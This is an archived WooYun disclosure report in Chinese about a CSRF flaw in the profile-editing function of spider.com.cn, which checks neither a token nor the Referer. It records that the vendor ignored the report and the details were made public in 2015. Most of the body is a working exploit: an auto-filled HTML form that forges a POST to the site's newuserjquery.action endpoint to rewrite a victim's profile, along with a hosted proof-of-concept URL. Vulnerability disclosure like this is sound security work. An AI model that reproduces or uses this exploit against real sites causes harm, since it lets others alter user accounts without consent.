乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-20: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经主动忽略漏洞,细节向公众公开
csrf
修改个人信息处未加token验证 未验证refer
<html> <body> <form action="http://www.spider.com.cn/newuserjquery.action" method="POST"> <input type="hidden" name="usertype" value="first002" /> <input type="hidden" name="useralise" value="wooyuntest" /> <input type="hidden" name="sex" value="m" /> <input type="hidden" name="year_sld" value="2015" /> <input type="hidden" name="month_sld" value="01" /> <input type="hidden" name="day_sld" value="01" /> <input type="hidden" name="uxzvalue" value="Capricorn" /> <input type="hidden" name="xue_sld" value="" /> <input type="hidden" name="zhi_sld" value="" /> <input type="hidden" name="shou_sld" value="" /> <input type="hidden" name="_Province" value="" /> <input type="hidden" name="_City" value="null" /> <input type="hidden" name="_Region" value="null" /> <input type="hidden" name="interestall" value="" /> <input type="hidden" name="signature" value="tomatotest" /> <input type="hidden" name="filminterest" value="" /> <input type="hidden" name="uheight" value="" /> <input type="hidden" name="uweight" value="" /> <input type="hidden" name="mybody" value="" /> <input type="hidden" name="mycar" value="" /> <input type="hidden" name="fang_sld" value="a" /> <input type="submit" value="Submit request" /> </form> </body></html>
访问
poc地址:http://xss.gift/spidercsrf.html
危害等级:无影响厂商忽略
忽略时间:2015-08-25 15:42
漏洞Rank:4 (WooYun评价)
暂无